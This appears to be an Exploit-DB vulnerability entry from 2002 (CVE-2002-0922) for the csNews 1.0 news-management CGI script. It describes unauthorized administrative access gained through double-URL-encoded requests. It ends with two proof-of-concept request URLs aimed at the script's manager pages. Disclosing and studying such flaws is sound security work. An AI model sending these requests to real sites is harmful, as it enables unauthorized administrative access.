CGIScript.net csNews 1.0 Double URL Encoding Unauthorized Administrative Access

2002-06-11T00:00:00
ID EDB-ID:21532
Type exploitdb
Reporter Steve Gustin
Modified 2002-06-11T00:00:00

Description

CGIScript.net csNews 1.0 Double URL Encoding Unauthorized Administrative Access. CVE- 2002-0922,CVE-2002-0922. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/4993/info

csNews is a script for managing news items on a website. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.

Users with "public" access to the system may be able to view and modify some administration pages. This is accomplished by submitting a HTTP request in which some metacharacters are double URL encoded.


CSNews.cgi?database=default%2edb&command=showadv&mpage=manager
CSNews.cgi?command=manage&database=default%2edb&mpage=manager